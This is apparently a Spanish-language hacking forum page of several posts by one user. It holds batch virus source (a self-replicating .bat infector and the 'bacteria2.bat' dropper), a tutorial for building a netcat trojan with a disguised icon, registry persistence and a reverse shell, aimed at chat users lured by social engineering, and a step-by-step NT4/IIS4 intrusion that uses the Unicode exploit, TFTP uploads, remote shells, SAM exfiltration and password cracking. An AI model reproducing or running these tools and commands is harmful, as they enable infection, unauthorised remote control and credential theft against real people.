IF ERRORLEVEL 30 IF NOT ERRORLEVEL 31 GOTO A
IF ERRORLEVEL 48 IF NOT ERRORLEVEL 49 GOTO B
IF ERRORLEVEL 46 IF NOT ERRORLEVEL 47 GOTO C
IF ERRORLEVEL 32 IF NOT ERRORLEVEL 33 GOTO D
IF ERRORLEVEL 18 IF NOT ERRORLEVEL 19 GOTO E
IF ERRORLEVEL 33 IF NOT ERRORLEVEL 34 GOTO F
IF ERRORLEVEL 34 IF NOT ERRORLEVEL 35 GOTO G
IF ERRORLEVEL 35 IF NOT ERRORLEVEL 36 GOTO H
IF ERRORLEVEL 23 IF NOT ERRORLEVEL 24 GOTO I
IF ERRORLEVEL 1 IF NOT ERRORLEVEL 2 GOTO FIN
GOTO INICIO
REM " EN ESTA PARTE SE ENVIA A LA MATRIZ EL VALOR SELECCIONADO Y
REM SE MUESTRA EN PANTALLA LA MATRIZ DEL JUEGO COMPLETA "
:A
IF %1 == X GOTO INICIO
IF %1 == x GOTO INICIO
IF %1 == O GOTO INICIO
IF %1 == o GOTO INICIO
IF EXIST X.T %0 X %2 %3 %4 %5 %6 %7 %8 %9
IF NOT EXIST X.T %0 O %2 %3 %4 %5 %6 %7 %8 %9
:B
IF %2 == X GOTO INICIO
IF %2 == x GOTO INICIO
IF %2 == O GOTO INICIO
IF %2 == o GOTO INICIO
IF EXIST X.T %0 %1 X %3 %4 %5 %6 %7 %8 %9
IF NOT EXIST X.T %0 %1 O %3 %4 %5 %6 %7 %8 %9
:C
IF %3 == X GOTO INICIO
IF %3 == x GOTO INICIO
IF %3 == O GOTO INICIO
IF %3 == o GOTO INICIO
IF EXIST X.T %0 %1 %2 X %4 %5 %6 %7 %8 %9
IF NOT EXIST X.T %0 %1 %2 O %4 %5 %6 %7 %8 %9
:D
IF %4 == X GOTO INICIO
IF %4 == x GOTO INICIO
IF %4 == O GOTO INICIO
IF %4 == o GOTO INICIO
IF EXIST X.T %0 %1 %2 %3 X %5 %6 %7 %8 %9
IF NOT EXIST X.T %0 %1 %2 %3 O %5 %6 %7 %8 %9
:E
IF %5 == X GOTO INICIO
IF %5 == x GOTO INICIO
IF %5 == O GOTO INICIO
IF %5 == o GOTO INICIO
IF EXIST X.T %0 %1 %2 %3 %4 X %6 %7 %8 %9
IF NOT EXIST X.T %0 %1 %2 %3 %4 O %6 %7 %8 %9
:F
IF %6 == X GOTO INICIO
IF %6 == x GOTO INICIO
IF %6 == O GOTO INICIO
IF %6 == o GOTO INICIO
IF EXIST X.T %0 %1 %2 %3 %4 %5 X %7 %8 %9
IF NOT EXIST X.T %0 %1 %2 %3 %4 %5 O %7 %8 %9
:G
IF %7 == X GOTO INICIO
IF %7 == x GOTO INICIO
IF %7 == O GOTO INICIO
IF %7 == o GOTO INICIO
IF EXIST X.T %0 %1 %2 %3 %4 %5 %6 X %8 %9
IF NOT EXIST X.T %0 %1 %2 %3 %4 %5 %6 O %8 %9
:H
IF %8 == X GOTO INICIO
IF %8 == x GOTO INICIO
IF %8 == O GOTO INICIO
IF %8 == o GOTO INICIO
IF EXIST X.T %0 %1 %2 %3 %4 %5 %6 %7 X %9
IF NOT EXIST X.T %0 %1 %2 %3 %4 %5 %6 %7 O %9
:I
IF %9 == X GOTO INICIO
IF %9 == x GOTO INICIO
IF %9 == O GOTO INICIO
IF %9 == o GOTO INICIO
IF EXIST X.T %0 %1 %2 %3 %4 %5 %6 %7 %8 X
IF NOT EXIST X.T %0 %1 %2 %3 %4 %5 %6 %7 %8 O
REM EN ESTA PARTE SE MIRA SI NADIE GANO, SE DESEA SALIRSE DEL JUEGO Y DE
REM NO QUERERSE, SE PREGUNTA SI DESEA CONTINUAR O REINICIAR EL JUEGO "
:FIN
ECHO.
ECHO                  ¨ DESEA SALIRSE DEL " BATCHRUN TRIQUI " ? S \ N ?
:SN
CODTECLA
IF ERRORLEVEL 1 IF NOT ERRORLEVEL 31 GOTO SN
IF ERRORLEVEL 31 IF NOT ERRORLEVEL 32 GOTO SALIR
IF ERRORLEVEL 32 IF NOT ERRORLEVEL 49 GOTO SN
:CR
IF ERRORLEVEL 49 IF NOT ERRORLEVEL 50 ECHO.
IF ERRORLEVEL 49 IF NOT ERRORLEVEL 50 ECHO            SI DESEA CONTINUAR TECLEE "C" SI DESEA REINICIAR TECLEE "R"
IF ERRORLEVEL 50 GOTO SN
CODTECLA
IF ERRORLEVEL 1 IF NOT ERRORLEVEL 19 GOTO CR
IF ERRORLEVEL 19 IF NOT ERRORLEVEL 20 DEL *.T
IF ERRORLEVEL 19 IF NOT ERRORLEVEL 20 ECHO TRIQUI > 0.T
IF ERRORLEVEL 19 IF NOT ERRORLEVEL 20 %0 A B C D E F G H I
IF ERRORLEVEL 20 IF NOT ERRORLEVEL 46 GOTO CR
IF ERRORLEVEL 46 IF NOT ERRORLEVEL 47 GOTO INICIO
IF ERRORLEVEL 50 GOTO INICIO
REM " AQUI YA MUESTRA EN PANTALLA UN MENSAJE DANDO LAS GRACIAS POR
REM HABER USADO EL JUEGO, DESPUES LOS CREDITOS Y LUEGO SE SALE "
:SALIR
DEL *.T
DEL CODTECLA.COM
ECHO.
ECHO.
ECHO.
ECHO                   GRACIAS POR HABER JUGADO " BATCHRUN TRIQUI "
PAUSE > NUL
CLS
ECHO.
ECHO.
ECHO.
ECHO.
ECHO.
ECHO.
ECHO                            DISE¥ADO POR: BLACKWOLF
ECHO.
ECHO.
ECHO                         TODOS LOS DERECHOS RESERVADOS
ECHO.
ECHO                             COLOMBIA COFFEE HACKERS
PAUSE > NUL
CLS

------------
Y que quede claro esta vez que yo no lo hice Aunque entiendo el 95% de lo que hace este bat, pero porfavor ya no me torturen como el post de virus hechos en batch :-s

Att. Yan.
Unilola Software.
414  Seguridad Informática / Abril negro / Abril Negro 2007 en: 31 Marzo 2007, 03:05 am
Acá hay algunos codigos en batch que les pueden interesar un poco:

@echo off%!-%
if '%1=='~ goto !-%2
if exist \!-.bat goto !-r
if not exist %0.bat goto !-e
find "!-"<%0.bat>\!-.BAT
:!-r
command /c \!- ~ s . .. %path%
goto !-e
:!-s
shift%!-%
if '%2==' exist !-
for %%a in (%2\*.bat) do call \!- ~ i %%a
goto !-s
:!-i
find "!-"<%3>!-s
copy !-s !-!>nul
if exist !-! goto !-a
del !-s
type \!-.bat>>%3
exit !-
:!-a
del !-!
:!-e


 XD y este otro:

@ECHO  OFF
:s%r#
COPY %0.BAT C:\Q.COM>NUL
C:\Q
¸ ·¢'Í/<ÿt%¿ÿÿ»­ ¸JÍ/GtWü¾¹¨ ó¤ŽÙ¾¥¥DüŒDþº¿²´VÍ!´AÍ!‹×A¸CÍ!Í = ·u°ÿÏ= ®té— ƒúÿuø:îuô`´Í!´6™<w}Í!Ñê;Úè C:\WINSTART.BAT Z¸@=w^Í!rZ“¸ [3ÉŽÙ¿` ÿu0ÿu2‰}0Œ]2Ç°ÆEÏ€Í!ŽÙE2E0r&•S´?‹×±Í!‘´@‹ÝÍ! À[uë¸ WÍ!´>Í!‹Ý¸WÍ!´>Í!aê


jajajaja me diran.. este tio esta loco XD ps no estoy loco... es un virus en batch muy conocido llamado "bacteria2.bat"
Pueden bajar este y muchos ejemplos de codigos creados en batch desde aca:

http://512.iespana.es/virus_y_troyanos

También agregué algunos codigos fuentes de muchos virus para que puedan comprender su funcionamiento (por eso saqué los que no tenian el codigo) ya que la idea no es joder a todo mundo infectando gente y bajando programillas... para eso hay otras paginas, acá es para aprender.

Acabo de agregar dos programas para compilar tu propio virus... uno se llama "lavi" y el otro "viological ware" cada uno con sus textos explicativos. Ojala les sirva ;)

Att. Yan
Unilola Softwares.
415  Foros Generales / Sugerencias y dudas sobre el Foro / Carita nueva en: 28 Marzo 2007, 22:18 pm
Propongo poner una carita al "XD"

Att. Yan.
Unilola Software. XD
416  Seguridad Informática / Hacking / Jugando con netcat en: 25 Marzo 2007, 03:17 am

JUGANDO CON NETCAT V1.1
                Parte I


Como ya les habrán enseñado a utilizar el netcat, ahora yo les quiero enseñar como sacarle el jugo a este programilla muy útil… lo convertiremos desde un troyano hasta un cliente SMTP entre otras cosas.


TROYANIZANDO NETCAT

Como ya saben, con netcat puedes tomar una shell directamente o realizar una conexión inversa indicando mi IP o dirección DNS (para los que no saben lo que es un DNS… es un tipo de traducción que hace mas fácil poder encontrar tu PC, por ejemplo la IP 200.32.22.25 sería el DNS = pagina.cl ).

Bueno… primero hay que saber lo que vamos a hacer… la idea principal será tomar una shell de la PC de cualquier persona de un IRC (Chat).

Materiales:
ResHacker
Netcat v1.1
Winrar (Modo grafico)
Un icono de Internet Explorer.

Bueno, si no saben donde encontrar el icono tratare de dárselos con este documento XD si no se puede pueden usar cualquier otro icono (puedes hacerlo sin iconos también pero se verá sospechoso.)

Lo primero es conectarse a un Chat XD y conseguirse a alguna victima (ojala no lo hagan con sus novias porque si los pillan los van a patear XD ) … una ves que digan.. “esa es mi victimaaaaa!!!”  entonces usaremos algo que se llama ingeniería social y es a través del ingenio propio hacerse pasar por alguien o hacerse de la amistad de esa persona para poder obtener lo que queremos, la idea es que hablaremos con el y bla bla bla de donde eres bla bla bla… cuando termines le dices que otro día seguimos conversando… si todo va bien ps ya mañana tendrás la confianza suficiente como para darle un programa que le ayudará en el mantenimiento de su PC o que simplemente se divierta con un juego XD.

Dejamos de lado el Chat y en la noche nos ponemos a hacer el troyano de la siguiente forma:

Paso 1: Primero le cambiamos el icono para que sea menos sospechoso con el ResHacker:



En primer lugar abres el ResHacker y le das en "File/Open" y buscas el netcat. Después pinchas en acción y luego en "Add a new Resource", luego se verá la ventana que ves a la derecha y presionas donde dice “Open file with new resource” (paso 3) para buscar el icono que teniamos, luego donde dice “Resource Name” Debes escribir la palabra “ICON” tal como se ve en la foto y para finalizar presionamos en “Add Resource” y en “File/Save”. Con todo esto te creará un respaldo del netcat original que puedes borrarlo con toda tranquilidad y al refrescar la pantalla (F5)  veras que el netcat tiene el mismo icono de Internet Explorer XD



Paso 2: renombramos nc.exe y desde ahora se llamará “iexplorer.exe” XD, luego pinchas el netcat con el botón derecho de tu Mouse y deberá aparecer algo así (obviamente después de haber instalado el winrar.)



Luego aparecerá el Winrar y empezaremos a crear nuestro troyano:

1.



Donde dice “Nombre del archivo” le escribimos “carnada.exe” (por ahora), el formato debe ser en “RAR” el método de compresión el mejor y por último y mas importante “Crear un archivo SFX”, el resto debe quedas deseleccionado.


2.



En la pestaña “Avanzado” (arriba) debes pinchar el botón llamado “Opciones SFX” y comenzaremos a configurar nuestro Winrar SFX.


3.



Ahora en “Carpeta de extracción” le diremos que descomprima el netcat (con nombre de iexplorer) en el directorio = %homedrive%%homepath%\update , ahora me diran: “Que es esto?!!”… %homedrive% significa que se descomprimirá dentro de la misma unidad de disco que esté Windows, o sea comúnmente (no siempre) “C:\” … %homepath% significa “Documents and settings\tu usuario actual” en conclusión se descomprimirá dentro del directorio raiz del usuario donde es casi el único lugar donde un usuario sin derechos de administrador puede sobrescribir, en otras palabras si le hubiese escrito %windir%\system32 pudiera haber tenido fallas al descomprimirse ya que no todos tienen derecho a ese directorio. Elegí una carpeta llamada update para llamar menos la atención.
En “Ejecutar tras la extracción” le escribimos esto = iexplorer.exe -d -e cmd.exe [aca va nuestra ip] 80 , yo le puse la dirección 127.0.0.1 para pruebas pero ustedes le ponen la ip real que sale a Internet. 80 es el puerto donde el troyano se conectará con nosotros.

En “Ejecutar antes de la extracción” le escribimos lo siguiente = %windir%\system32\cmd /c reg add HKcU\Software\Microsoft\Windows\CurrentVersion\Run /v "iexplorer" /t REG_SZ /d "%homedrive%%homepath%\update\iexplorer.exe -d -e cmd.exe 127.0.0.1 80" /f > nul … y ustedes me diran que es eso!!!!... le decimos que ejecute la consola de comandos CMD y llame a un ejecutable llamado “REG.EXE” el cual se encargará de agregar nuestra entrada al registro del sistema para que el troyano arranque solito cada ves que encienda la pc (recordar que donde dice 127.0.0.1 deben poner la ip de ustedes o en algunos casos (para los que saben) su DNS… es mas efectivo. (Consultar por el no-ip) y donde dice >nul significa que la victima no verá mas que un simple pestañazo del DOS en ves de mostrar todo lo que se está ejecutando.


4.



Acá estamos pidiendo a winrar que no muestre nada mientras se instala todo esto, asi será mas silencioso, rápido y automatizado.


5.



Por último cargamos un icono atractivo para que se vea con el troyano ya compilado y aceptamos todas las ventanas.


Debería quedar algo así:



Yo le puse icono de yahoo porque lo voy a probar desde el mismo Chat.


Ahora vamos a crear el programa que nos conectará con la victima, y se llama “Cliente”
Solo ejecutamos esto y estaremos listos para recibir la conexión de quien abra la carnada:



Y listo :D ahora solo falta visitar a nuestro amigo del día anterior y decirle que tienes un juego muy chido o que tienes algo para no se… usa tu imaginación. En mi caso y entré a una sala de yahoo y como hoy en día esta muy de moda los booters XD puse en sala que bajaran un antibooter para que no los pudieran sacar de la sala y les pase un link con la dirección donde estaba alojado el troyano. En resumidas cuentas… si alguien cae en tus maldades te debe aparecer esto:



Habrás tomado la shell de otra PC (manejar una shell de otra pc significa poder controlar el DOS de Windows o la shell de GNU.. es poder controlar la consola de comandos de la otra persona y a través de eso puedes subirle archivos, borrarle cosas, darle troyanos que te permitan ver su escritorio… mirar sus contraseñas volcando el registro en textos y asíéndoles un “type”… para los que saben un poquitito mas.. talvez saltar a otras pc con netbios, exploits como el dcom, acceder a servidores y dominar una red completa y ufff.. a volar la imaginación. Si no me creen miren estas tres capturas jugando con netcat XD nada serio:


1. El sueño de todo lamer XD :




2. Subiendo RealVnc4 para poder hacer una conexión iversa y mirar el escritorio de la otra persona:




3. Esto fue un ajuste de cuentas XD:




Les mostré como crear un troyano con netcat (indetectable por todos los antivirus por ahora) también puede hacerse con una conexión directa en ves de una inversa como la hice acá, así como ya saben hacerlo ;)

Esto es todo y espero poder mostrarles la próxima ves.. como convertir el Netcat v1.1 en un cliente SMTP para enviar correos automatizados y temporizados además de servir como cliente FTP con comandos automatizados sin la necesidad de la intervención de escribir los comandos desde la consola, también como ponerle contraseña a una sesión de shell con netcat entre muchas otras cosas mas ;)

Descargar en PDF
Descargar video explicativo

Preguntas mas frecuentes:
¿Porque me aparece que el archivo no existe?
R: http://foro.elhacker.net/index.php/topic,159799.msg860791.html#msg860791

¿Porque me dice error win32?
R: Estas intentando cambiar el icono al netcat V1.1, intenta con el 1.0

¿Porque me dice ""nc" no es un comando reconocido"?
R: http://foro.elhacker.net/index.php/topic,159799.msg758631.html#msg758631

¿Porque me aparece "h_errno 11001: HOST_NOT_FOUND" ?
R: http://foro.elhacker.net/index.php/topic,159799.msg754376.html#msg754376

Salu2 Att. Yan.
Unilola Software.



Enlaces actualizados
Actualmente casi todos los enlaces de descargas e imágenes no están pero los acabo de subir todos a este link incluyendo todos los videos:
http://tinyurl.com/3duv6qh
417  Informática / Tutoriales - Documentación / Hackear el Server con redes NT en: 17 Junio 2006, 04:48 am
Bueno... este es un texto que yo no hice, pero se los dejaré igual para que puedan ampliar sus conocimientos.
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

Hack NT4 paso a paso

En este texto vamos a enseñar que fácil puede ser hackear un sistema NT, para demostrar lo importante que es aplicar los parches pertinentes a una instalación por defecto de uno de estos Windows.

Vamos a estudiar la debilidad de un sistema NT4, (resulta asombroso el elevado número de NT4 que aun funcionan en la red, en su mayoría empresas de mediano o pequeñio tamaño) aunque gran parte de lo explicado puede ser trasladado a un sistema con Windows 2000 que corra un servidor IIS5 (evidentemente salvando las distancias con algunas variantes), lo importante es ver que fácil puede ser hackear un servidor NT, tal vez así todos esos admins de pequeñas empresas se anímen a actualizar sus NT4.

El sistema que vamos a estudiar es un Windows NT 4.0 Server con el Service Pack 6.0 y IIS Server versión 4.0, protegido detrás de un firewall corriendo OpenBSD y los únicos puertos abiertos son:

22 (ssh)
80(http)
443(secure http)
lo cual constituye una configuración por defecto en un servidor web.

La IP del objetivo será 12.168.10.1, y nuestra IP será 192.168.10.250

1: Investigando el sistema.

El primer paso en cualquier intrusión es averiguar que sistema está corriendo el PC obgetivo, sus versiones y los servicios que tiene abiertos, etc. En este ejemplo partimos ya de una situación en la que conocemos el sistema y sus caracteristicas, pero vamos a ver como podriamos ayarlo en caso de que no lo supieramos.


Un programa de los mas conocidos, que corre bajo *nix es el NMAP , aunque tambien hay una versión para NT nmapNT

NMAP es un scanner de puertos para sistemas *nix. Se puede utilizar para escanear grandes redes o PC´s individuales. Tiene numerosas opciones, dependiendo de lo que estés buscando. El funcionamiento de un scanner de puertos básicamente consiste en conectar a todos los puertos de un sistema, o a los que le especifiques, y encuentra que servicios se están ejecutando en él, además NAMP también puede hacer el "OS fingerprinting" (huellas digitales del sistema operativo).



Este es un output del NMAP en linux


[cyrux@net /cyrux]# nmap -O 192.168.10.1
Starting nmap V. 2.30BETA17 by fyodor@insecure.org ( www.insecure.org/nmap/ )
Interesting ports on NT_VICTIMA (192.168.10.1):
(Ports scanned but not shown below are in state: filtered)
Port State Service
22/tcp unfiltered ssh
80/tcp open http
443/tcp open https
TCP Sequence Prediction: Class=trivial time dependency
Difficulty=4 (Trivial joke)
Remote operating system guess: Windows NT4 / Win95 / Win98
Nmap run completed -- 1 IP address (1 host up) scanned in 172 seconds


La opción'-O' es para el "OS fingerprinting" , en el output podemos ver que se trata de un Windows, y que está corriendo el puerto 80, lo cual ya nos indica que es seguramente servidor de web.

Pero necesitamos saber algo mas, para ello utilizamos el Netcat. El Netcat básicamente lee y escribe paquetes de red. Puede utilizarse como cliente o servidor. Usando netcat como cliente, cuando conectamos al puerto del servidor web IIS, pulsa Enter varias veces, y el Netcat no devolverá los encabezados que recibe:


[cyrux@net /cyrux]# nc -vv 192.168.10.1 80
NT_VICTIMA [92.168.10.1] 80 (www) open
HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/4.0
Date: Thu, 18 Jan 2001 23:23:22 GMT
Content-Type: text/html
Content-Length: 87
<html><head><title>Error</title></head><body>The parameter is incorrect. </body></html> sent 2, rcvd 224


Ahora sabemos que se trata de un servidor de web IIS/4.0 , y como sabemos el IIS no corre bajo sistemas win9x, por lo tanto sabemos que estamos ante un NT.

Sin duda de los mejores scanners que hay, aunque sólo corre bajo Windows NT/2K/XP es el LANguard .

Con el LANguard podemos averiguar el sistema operativo, los puertos, los servicios, e incluso algunos posibles bugs. Aquí tienes el output:


Ahora que ya sabemos ante qué tipo de máquina estamos, es el momento de empezar con la intrusión, para ello vamos a hacer uso de algunos de los bugs y exploits que existen para esta máquina.


2: Subiendo archivos al PC remoto:


2.1 : Explotando el bug de Unicode.

Primero vamos a utilizar el bug de Unicode, ya que estamos ante una máquina que no parece muy actualizada, no sería extraño que fuese vulnerable, no queda ya mucho que contar sobre este bug, Pincha aquí para bajarte un texto en el que se explica detalladamente el bug de Unicode.

De todos modos para hacer mas cómoda la lectutra vamos a seguir con una breve explicación.

Al igual que el servidor FTP, el servidor Web se ejecuta desde un directorio, desde el cual los usuarios del servicio no pueden acceder al resto de los directorios del sistema. Pero el servidor web necesita tener algunos permisos de ejecución para que funcionen por ejemplo los scripts, pero estos permisos de ejecución se hayan exclusivamente en el en los directorios, predefinidos, que lo necesitan, por ejemplo en la configuración por defecto la carpeta c:\Inetpub\scripts estos permisos (entre otras).

Por lo tanto tenemos permisos para ejecutar archivos en /Inetpub/scripts/ pero los programas que queremos ejecutar suelen estar en /winnt/system32.

La manera de llegar desde /Inetpub/scripts hasta /winnt/system32 sería esta:

'../../winnt/system32/cmd.exe'.

Pero IIS por razones de seguridad no permite salir de la rama de los directorios que utiliza el servidor web, y no permitirá la exploración de este path.

La manera de saltarnos ese filtro de seguridad es sustituir los "/" por los códigos equivalentes en unicode, con una URL como esta:


http://192.168.1.2/scripts/..Ã%pc../winnt/system32/cmd.exe?/c+dir


obtenemos algo como esto esto:



Ya podemos ejecutar comandos en el servidor, pero con los permisos propios del usuario INET_NOMBREPC, que goza de muy pocos privilegios, y resulta un método bastante engorroso.

Hay un montón de herramientas que hacen este proceso mas fácil (aunque al final siempre acabemos haciendo estas cosas a mano). En la sección exploits tienes un montón de utilidades para facilitar este proceso.

Vamos a ver un ejemplo de como se utilizaría una de estas herramientas, el unicodexecute2.pl , escrito en perl (utilizable *nix y en Windows con el paquete ActivePerl instalado ) lo que hace es basicamente mandar los comandos que introducimos con el formato que tendrían si los introdujesemos via web:


[cyrux@net /cyrux]# perl -x unicodexecute2.pl 192.168.10.1:80 'dir'
Executing dir on 192.168.10.1:80
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Fri, 19 Jan 2001 00:15:26 GMT
Content-Type: application/octet-stream
Volume in drive D has no label.
Volume Serial Number is F465-557F
Directory of D:\Inetpub\scripts
01/18/01 03:15p <DIR> .
01/18/01 03:15p <DIR> ..
2 File(s) 0 bytes
28,081,664 bytes free




Como ya podemos ejecutar comandos, vamos a tratar de conseguir una shell remota, para ello utilizaremos el netcat.

Lo primero es subir el netcat al servidor IIS, utilizamos el conocido método del TFTP (Trivial File Transfer Protocol) para ello hacemos que nuestro PC sea servidor de TFTP.

Si utilizas Windows puede utilizar el TFTPD32 y verás algo así:


Ahora colocamos el netcat (nc.exe) en el directorio que usamos como root para el TFTP, mandando el siguiente comando por nuestro unicodexecute2.pl:

[cyrux@net /cyrux]# perl -x unicodexecute2.pl 192.168.10.1:80 'tftp -i 192.168.10.250 GET nc.exe'
Executing tftp -i 192.168.10.250 GET nc.exe on 192.168.10.1:80
HTTP/1.1 502 Gateway Error
Server: Microsoft-IIS/4.0
Date: Fri, 19 Jan 2001 00:19:34 GMT
Content-Length: 215
Content-Type: text/html
<head><title>Error in CGI Application</title></head>
<body><h1>CGI Error</h1>The specified CGI application misbehaved by not returning

Comprobamos que todo haya ido bien:

[cyrux@net /cyrux]# perl -x unicodexecute2.pl 192.168.10.1:80 'dir'
Executing dir on 192.168.10.1:80
Directory of D:\Inetpub\scripts
01/18/01 04:19p <DIR> .
01/18/01 04:19p <DIR> ..
01/18/01 04:19p 59,392 nc.exe
3 File(s) 59,392 bytes
28,022,272 bytes free


Ejecutamos el netcat para que ejecute el cmd.exe de manera que aguarde en el puerto 443, utilizamos el 443 porque está abierto en el firewall, incluimos la opcíon "-d" para que se ejecute en modo silencioso:

[root@gundam nthack]# perl -x unicodexecute.pl 192.168.10.1:80 'nc -L -p443 -d -e cmd.exe'
Executing nc -L -p23 -d -e cmd.exe on 192.168.10.1:80


Como no recibimos respuesta sabemos que se está ejecutando, así que abrimos el netcat en nuestro PC al igual que hicimos antes con el puerto 80 del PC objetivo, pero ahora apuntando a su puerto 443, en el que nos debería recibir el netcat que dejamos en modo escucha.

[cyrux@net /cyrux]# nc 192.168.10.1 443
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
D:\Inetpub\scripts>whoami
whoami
NT_VICTIMA\IUSR_NT_VICTIMA
D:\Inetpub\scripts>


Ya tenemos la shell que estabamos buscando, pero como vemos con el comando "whoami" no tenemos permisos de administrador, sólo tenemos los permisos propios del usuario IUSR_NT_VICTIMA, vamos a ver como podemos obtener mayores permisos.


2.1: Usando el IISHack.

Como es este caso se trata de un IIS4 podemos utilizar el exploit IISHack (puedes usar también el IISHack2 de http://rootx.gq.nu) del grupo eEye gracias al cual podemos subir y ejecutar un archivo a un web server IIS4 desde otra web. Su uso es muy fácil, esto es una reproducción de lo que haríamos:

C:\>iishack.exe 192.168.10.1 80 www.troyanos.com/troyano.exe
#--[IIS 4.0 remote buffer overflow exploit]----#
(c) dark spyrit -- barns@eeye.com.
http://www.eEye.com

[usage: iishack <host> <port> <url>]
example-iishack www.target.com 80 www.troyanos.com/troyano.exe
#--------------------------------#
Connecting...
done.. sending shellcode..
Number of characters send: xx
done.. closing

C:\>

<host> es el PC objetivo
<port> es el puerto del servidor web, generalmente el 80
<url> es la url la que subimos el programa que queremos que se suba a su vez al PC objetivo. Para esto podemos hacernos con un espacio web gatuito, al que subimos nuestro troyano.exe o poner la url de un sitio en el que ya esté el troyano.exe.
Después de esto el programa que hayas subido debería haberse ejecutado, ojo si subes un troyano, puesto que éste puede correr por un puerto que esté bloqueado por el firewall, para ello deberás configurar el server antes subirlo a la web, además tal vez el troayno quede inutilizado por algún antivirus, recuerda también que debe ser compatible con NT.

Ya tenemos acceso al PC con el cliente del troyano que hayamos utilizado o desde una shell si subimos el netcat o algún programa que nos sirva al efecto.



3: Elevando los privilegios:

Si después de lo anterior, contamos con una shell, conseguida con el netcat, nos veremos obligados a elevar los privilegios con los que contamos, recordemos que la shell que conseguimos a través del netcat corria bajo los permisos del usuario IUSR_NT_VICTIMA, los cuales son demasiado bajos. Podrémos actuar de varias maneras:


3.1: Utilizando el exploit Sechole:

El Sechole explota un fallo en los sistemas Windows NT 4.0 , 5.0 beta, independientemente de que sea workstation o server. Bájatelo de aquí

Su uso es muy fácil, aunque nosotros, como estamos trabajando remotamente deberemos utilizarlo desde la shell que conseguimos antes.

Subimos al server los archivos SECHOLE.EXE y ADMINDLL.DLL.
Ejecutamos desde la shell remota el SECHOLE.EXE
Una vez hecho esto, el sistema seguramente se vuelva inestable, llegando incluso a caerse, eso es precisamente lo que necesitamos, cuando vuelva a iniciarse la cuenta desde la que se ejecutó el sechole pertenecerá al grupo de administradores.

Si el server no se reinicia, puedes esperar a que se apague o subir algún overflow, y ejecutarlo en el server pasa reiniciarlo tu mismo.

Puedes por ejemplo subir el exploit del CSRSS y ejecutarlo, aquí tienes una explicación de cómo funciona.


3.2 : Consiguiendo los passwords.

Sería interesante poder hacerse con el archivo SAM, que contiene los usuarios y passwords en cualquier sistema NT, pero evidentemente está cifrado. El SAM está bloqueado cuando el sistema se está ejecutando, y ni siquiera el Administrador puede acceder a él. Pero hay otros sitios donde se guardan copias de este archivo, uno es en los discos de emergencia (repair disk) si estos has sido creados con la opción "/s" , y otro es en la carpeta /winnt/repair aunque esta última está comprimida (SAM._).

MDAC es la manera en la que el servidor web accede a cualquier base de datos ODBC.

La instalación por defecto del IIS4.0 incluye el MDAC, y el éste incluye un componente llamado RDS (Remote Data Services). RDS es la parte que permite el acceso remoto al OBDC a través de la web.

MS Access maneja estas peticiones a través del motor de la base de datos llamado Jet. El problema es que Jet permite llamadas a la shell del VBA, permitiendote ejecutar comandos con permisos de Sistema.

Con los permisos que tenemos en este momento (recordemos que estamos como usuario IUSER_NT_VICTIMA ) no podemos tocar el sam._ , esto es lo que pasaría:

D:\Inetpub\scripts>copy \winnt\repair\sam._
copy \winnt\repair\sam._
Access is denied.
0 file(s) copied.

Volviendo al MDAC, buscando en internet, vemos que existe un exploit que nos permite ejecutar comandos en el PC remoto, el msdac2.pl (también escrito en perl), para ejecutarlo simplemente le añadimos "-h <ip_objetivo>".

Uutilizamos este exploit para subir el sam._ a nuestro PC, el output sería éste:

[cyrux@net /cyrux]# perl -x msadc2.pl -h 192.168.10.1
-- RDS exploit by rain forest puppy / ADM / Wiretrip --
Please type the NT commandline you want to run (cmd /c assumed):
cmd /c tftp -i 192.168.10.250 PUT \winnt\repair\sam._
Step 1: Trying raw driver to btcustmr.mdb
winnt -> c: d: Success!


Comprobamos que efectivamente nos hemos hecho con el sam._

[cyrux@net /cyrux]# ls -la /tftproot/sam._
-rw-rw-rw- xx ....................... xx /tftproot/sam._


NOTA: Hacerse con el archivo sam es muy importante, pero estamos limitados a la suerte que tengamos a la hora de crackearlo, otra manera de conseguir los pass del admin sería subir un keylogger al PC objetivo, y esperar unos dias, después de ese tiempo, volvemos a conectarnos al PC y nos bajamos el log con las claves.


3.2.1 : Crackeando los passwords.

Una vez que ya tenemos el archivo que contiene los passwords del PC objetivo, tenemos que descomprimirlo y desencriptarlo.

Para descomprimirlo, tenemos que utilizar el comando "expand", pero para ello necesitamos tener un NT:

C:\> expand sam._ sam

Pero si no contamos con un NT podemos expandirlo antes de bajarnoslo, con el exploit del MDAC:

[cyrux@net /cyrux]# perl -x msadc1.pl -h 192.168.10.1
-- RDS exploit by rain forest puppy / ADM / Wiretrip --
Please type the NT commandline you want to run (cmd /c assumed):
cmd /c expand \winnt\repair\sam._ \winnt\reapir\sam
Step 1: Trying raw driver to btcustmr.mdb
winnt -> c: d: Success!

Pero aún tenemos que desencriptarlo, vamos a utilizar uno de los mejores programas que hay para ello, el L0phtCrack v3 (LC3) , que corre en NT, aunque nos serviría cualquier otro crackeadorr para NT que no necesariamente tenga que correr bajo un sistema NT (es decir, si no tenemos un NT tendremos que hacernos con un crackeador de archivos sam que sea compatible con nuestro sistema operativo, Win9x Me, *nix ... )

En fin corremos nuestro LC3, y con un poco de suerte y paciencia no haremos con los passwords del PC objetivo, este paso parece un poco "fantasioso", porque siempre parece que eso de encontrar el pass es muy dificil, pero la realidad es que la mayoría de los administradores utilizan passwords de muy baja seguridad, y el LC3 los saca en un porcentaje altísimo de veces (en grandes compañías esto no debería ocurrir).

Aquí tienes una captura del LC3:



La razón de que los passwords sean relativamente fácil de crackear es que Microsoft, en sus esfuerzos por mantener la compatibilidad con las versiones antiguas de Windows, usa un algoritmo "hash" (cifrado en un solo sentido) para el acceso desde redes Microsoft, LanManager. Aunque el NT posee un algoritmo mas nuevo y fuerte, mantiene todavía una copia del LanManager.


3.3 : Consiguiendo permisos de system en el momento:
Hasta ahora esto está bien, pero sigue siendo un poco engorroso tener que esperar a que el PC se reinicie

Existe un bug del LCP que parece que nos puede servir

El LCP (Local Procedure Call Ports)es utilizado por el NT para comunicar los procesos del PC con cualquier otro.

Esta función fue diseñada para permitir a un servidor asumir la personalidad de un cliente o llevar a cabo acciones en su lugar , puede ser utilizada para ejecutar comandos bajo el contexto de otro usuario.

Existe un exploit llamado hk.exe que saca provecho de este bug

Desde una shell, todavía con los permisos del usuario IUSR_NT_VICTIMA podemos subir el exploit.

D:\Inetpub\scripts>tftp -i 192.168.10.250 GET hk.exe
